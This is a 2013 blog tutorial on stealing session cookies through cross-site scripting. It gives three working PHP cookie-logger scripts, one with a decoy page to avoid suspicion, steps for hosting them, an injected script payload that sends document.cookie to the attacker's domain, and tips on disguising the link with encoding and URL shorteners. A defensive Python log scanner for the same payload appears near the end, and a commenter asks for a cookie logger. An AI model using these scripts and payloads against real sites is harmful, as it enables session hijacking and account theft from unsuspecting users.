Tuesday 22 January 2013

Stealing Cookies With XSS



The content of this article is meant for educational purposes only. Neither I, nor my web host will be held responsible for what you decide to do with this knowledge.



Creating a Cookie Stealer
Method 1
This is the simplest method of creating a cookie stealer: it takes the cookie from the query string and appends it to a file called cookie.txt.

________________________________________________________________________________

Code:
<?php
    // $HTTP_GET_VARS is the old name for $_GET (deprecated, removed in PHP 5.4)
    $cookie = $HTTP_GET_VARS["cookie"];
    $steal = fopen("cookie.txt", "a");
    fwrite($steal, $cookie ."\n");
    fclose($steal);
?>

________________________________________________________________________________

Method 2
The above method wrote the cookies to a file. This method sends the cookie to an email address instead.

________________________________________________________________________________

Code:
<?php
    // $HTTP_GET_VARS is the old name for $_GET (deprecated, removed in PHP 5.4)
    $cookie = $HTTP_GET_VARS["cookie"];
    mail("inputyour@emailhere", "Stolen Cookies", $cookie);
?>
In the above code you only need to replace the placeholder with your email address.


________________________________________________________________________________


Method 3
The following script is more elaborate and is the one we will use.



________________________________________________________________________________

Code:
<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['REQUEST_METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    // use an HTML line break if the log file is itself .htm/.html, plain newlines otherwise
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();
echo '<center><p>Page Under Construction</p></center>';
// this part is displayed if the page is visited directly, in order to avoid any suspicion...
?>

________________________________________________________________________________


The above code not only steals the cookies but will also store the following:
IP address
Port number
Host
User-Agent


Copy and paste the above code into a text editor and save it as a .php file. Create a second file and save it as log.txt. This file can be left blank, as it is where the above information will be written. You can change the name, but if you do so you will also need to change the name in the cookie stealer code above.


Register a Domain Name
The next step is to sign up with a free hosting company that supports .php files and upload both files created above into the root directory. If you named the stealer file "zerosec", it would be located at:
Code:
www.your-domain.com/zerosec.php


Exploiting the Vulnerability
We are not going to cover how to find XSS vulnerable websites here. This tutorial assumes you already know. If not, let me know in the comments below.


Once you have found a vulnerable website you need to inject the following code between "script" tags.
Code:
(script tag) location.href = 'your-domain.com/zerosec.php?cookie='+document.cookie; (/script tag)


The above code can be inserted straight into a vulnerable URL like this:

________________________________________________________________________________

Code:
vulnerablesite.com/index.php?search=(script tag) location.href = 'http://www.your-free-domain.com/stealer.php?cookie='+document.cookie;(/script tag)


________________________________________________________________________________

In the above code, remember to input the script tags.


Difference between Persistent and Non-Persistent XSS
Injecting the code into a website that is vulnerable to persistent XSS means that the code will remain there until the admin finds and removes it. Everyone who visits the site would be a victim.


In non-persistent XSS attacks, the only victims will be the ones you actually send the link to, whereas in a persistent attack you only need to inject once. More websites are vulnerable to non-persistent than to persistent XSS, but there are still plenty of the latter out there.


One way in which an attacker will try to trick victims into clicking their links is to encode the URL. The problem with this is that the URL then becomes pretty long. The simple solution is to use a URL shortening service.


The victim will then be sent the short URL and their cookies will be sent to the log.txt file created and uploaded earlier.
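From the defender's side, the injection URL above and its percent-encoded variants leave a recognisable trace in the web server's access log. The following scanner is an added example, not code from the original post: it parses Apache-style combined-log lines, percent-decodes the query string repeatedly (so a double-encoded link is still caught), and flags the indicator strings of this payload. The log lines, IP addresses and host name are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format); not real traffic.
# The second line carries the injection URL from the post, percent-encoded; the
# third is the same idea double-encoded, which a single decode pass would miss.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Jan/2013:10:01:02 +0000] "GET /index.php?search=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Jan/2013:10:02:15 +0000] "GET /index.php?search=%3Cscript%3Elocation.href%3D%27http%3A%2F%2Fexample.invalid%2Fstealer.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 733 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Jan/2013:10:02:16 +0000] "GET /index.php?search=%253Cscript%253Edocument.cookie%253C%252Fscript%253E HTTP/1.1" 200 733 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Strings that appear in the cookie-exfiltration payload discussed above.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script", re.I),
    "document_cookie": re.compile(r"document\.cookie", re.I),
    "location_redirect": re.compile(r"location\.href\s*=", re.I),
}

def fully_decode(s, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads become visible."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def scan_line(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    decoded = fully_decode(query)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
            "decoded_query": decoded, "indicators": hits}

def scan_log(text):
    """Scan every line of an access log and return the findings in order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]
```

Marking session cookies HttpOnly keeps them out of document.cookie in the first place, so this detection complements rather than replaces output encoding of the reflected search parameter.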

3 comments:

  1. Wow, I have been looking for a cookie logger and seen a lot of old posts, but I guess yours seems more explainable. I would like to talk to you more if you don't mind... please hit me up @ onesmith2003@gmail.com
    Let's discuss.